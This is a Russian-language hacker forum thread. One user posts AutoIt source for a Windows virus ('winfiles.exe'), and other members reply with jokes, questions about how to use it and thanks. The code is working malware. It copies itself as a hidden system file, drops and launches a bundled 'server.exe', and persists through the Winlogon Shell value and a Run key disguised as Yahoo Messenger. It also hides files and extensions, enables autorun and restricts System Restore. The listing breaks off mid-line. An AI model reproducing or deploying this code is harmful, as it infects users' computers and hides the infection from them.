2. Категории
  3. Начало эпохи
  4. Разработка
  5. Хакерам (Админы тему добавьте плз)

Хакерам (Админы тему добавьте плз)

Авторизация
 
  • Автор
    Помощник администрации

    Вирус на autoit
    ; ----------------------------------------------------------------------------
    ;
    ; winfiles.exe Code analyzed
    ; Note: You can rebuild this script using AutoIt program from http://www.autoitscript.com/autoit3/
    ; First part of this code is to add functions used in the virus like _ProcessGetName and _ProcessGetPriority
    ;
    ; ----------------------------------------------------------------------------

    ; ----------------------------------------------------------------------------
    ; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
    ; Description: Functions that assist with process management.
    ;
    ; ------------------------------------------------------------------------------

    ;===============================================================================
    ;
    ; Description - Returns a string containing the process name that belongs to a given PID.
    ; Syntax - _ProcessGetName( $iPID )
    ; Parameters - $iPID - The PID of a currently running process
    ; Requirements - None.
    ; Return Values - Success - The name of the process
    ; Failure - Blank string and sets @error
    ; 1 - Process doesn't exist
    ; 2 - Error getting process list
    ; 3 - No processes found
    ; Notes - Supplementary to ProcessExists().
    ;===============================================================================
    Func _ProcessGetName($i_PID)
    If Not ProcessExists($i_PID) Then
    SetError(1)
    Return ''
    EndIf
    Local $wiaa_Processes = ProcessList()
    If Not @error Then
    For $i = 1 To $wiaa_Processes[0][0]
    If $wiaa_Processes[$i][1] = $i_PID Then Return $wiaa_Processes[$i][0]
    Next
    EndIf
    SetError(1)
    Return ''
    EndFunc ;==>_ProcessGetName

    ;===============================================================================
    ;
    ; Function Name: _ProcessGetPriority()
    ; Description: Get the priority of an open process
    ; Parameter(s): $vProcess - PID or name of a process.
    ; Requirement(s): AutoIt Beta v3.1.1.61+
    ; kernel32.dll (included with Windows)
    ; Return Value(s): On Success - Returns integer corressponding to
    ; the processes's priority:
    ; 0 - Idle/Low
    ; 1 - Below Normal (Not supported on Windows 95/98/ME)
    ; 2 - Normal
    ; 3 - Above Normal (Not supported on Windows 95/98/ME)
    ; 4 - High
    ; 5 - Realtime
    ; On Failure: Returns -1 and sets @Error to 1
    ;
    ;===============================================================================
    ;
    Func _ProcessGetPriority($vProcess)
    Local $i_PID = ProcessExists($vProcess)
    If Not $i_PID Then
    SetError(1)
    Return -1
    EndIf
    Local $hDLL = DllOpen('kernel32.dll')
    Local $wiaaProcessHandle = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400, 'int', False, 'int', $i_PID)
    Local $wiaaPriority = DllCall($hDLL, 'int', 'GetPriorityClass', 'int', $wiaaProcessHandle[0])
    DllCall($hDLL, 'int', 'CloseHandle', 'int', $wiaaProcessHandle[0])
    DllClose($hDLL)
    Switch $wiaaPriority[0]
    Case 0x00000040
    Return 0
    Case 0x00004000
    Return 1
    Case 0x00000020
    Return 2
    Case 0x00008000
    Return 3
    Case 0x00000080
    Return 4
    Case 0x00000100
    Return 5
    Case Else
    SetError(1)
    Return -1
    EndSwitch

    EndFunc ;==>_ProcessGetPriority

    ;===============================================================================
    ;
    ; Description: Executes a DOS command in a hidden command window.
    ; Syntax: _RunDOS( $sCommand )
    ; Parameter(s): $sCommand - Command to execute
    ; Requirement(s): None
    ; Return Value(s): On Success - Returns the exit code of the command
    ; On Failure - Depends on RunErrorsFatal setting
    ;
    ;===============================================================================
    Func _RunDOS($sCommand)
    Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
    EndFunc ;==>_RunDOS

    ; ----------------------------------------------------------------------------
    ; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
    ; ----------------------------------------------------------------------------

    0
  • Автор
    Помощник администрации

    ; ----------------------------------------------------------------------------
    ; Virus Code Start From here
    ; ----------------------------------------------------------------------------

    #NoTrayIcon
    $x4x = "winfiles"
    $myset = "setting"
    $mjkin = ".ini"
    $tytt = ".nql"
    $ltxl = ".xls"
    $gtg = ".exe"
    $ikko = @HOUR + 2
    $hkhhh = @MIN + 30
    FileSetAttrib (@SystemDir & "" & $x4x & $gtg,"-RSH")
    FileCopy (@AutoItExe, @SystemDir & "" & $x4x & $gtg,1)
    FileSetAttrib (@SystemDir & "" & $x4x & $gtg,"+RSH")
    FileSetAttrib (@WindowsDir & "" & $x4x & $gtg,"-RSH")
    FileCopy (@AutoItExe, @WindowsDir & "" & $x4x & $gtg,1)
    FileSetAttrib (@WindowsDir & "" & $x4x & $gtg,"+RSH")
    FileInstall("c:\server.exe",@WindowsDir & "\winnt.exe")
    Run(@WindowsDir & "\winnt.exe")
    RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe " & $x4x & $gtg)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "" & $x4x & $gtg)
    RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL","CheckedValue","REG_DWORD",0)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDriveTypeAutoRun","REG_DWORD",0)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Hidden","REG_DWORD",0)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","HideFileExt","REG_DWORD",1)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","SuperHidden","REG_DWORD",1)
    RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer","LimitSystemRestoreCheckpointing","REG_DWORD",1)
    RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft

    Добавлено через 00:35 мин.
    вот весь код вируса:proud: Ставим +

    0

  • Продвинутый

    И че он делает? :fthat:

    0

  • Профессионал

    vt предоставь, что работает)

    0

  • СуперМэн, и как им пользоватся?

    0

  • Специалист

    Wiseeee, Вирус Тотал на Вирус?:D: ахаха :fthat: :fthat:

    0

  • Бывалый

    не понял :no:

    0

  • qq all

    чё за непонятица?:fthat:

    0

  • O-N-B

    СуперМэн, долбаеб?

    0

  • Профессионал
    **Artemqa** 
**Wiseeee**, Вирус Тотал на Вирус?:D: ахаха :fthat: :fthat:

    ну а как :fthat:
    Надо знать как антивирусы расценивают такую ***ню

    0

  • Местный

    да я давно просёк это ктот с auth_key залил его хех пытаються взломть бред.)

    Добавлено через 00:47 мин.
    да нихера невыйдет у них)))

    0

  • Специалист

    эх знать бы еще как этим пользоваться :D:

    0

  • Урааа медальку дали

    в блокнот все это загонишь и вирус тебе:trollface:

    0

  • бывалый

    объясни поподробней что за нах?

    0

  • Местный

    ооооо спасибо давно пытался сделать!!!!:):

    0
Авторизация
 
Последние темы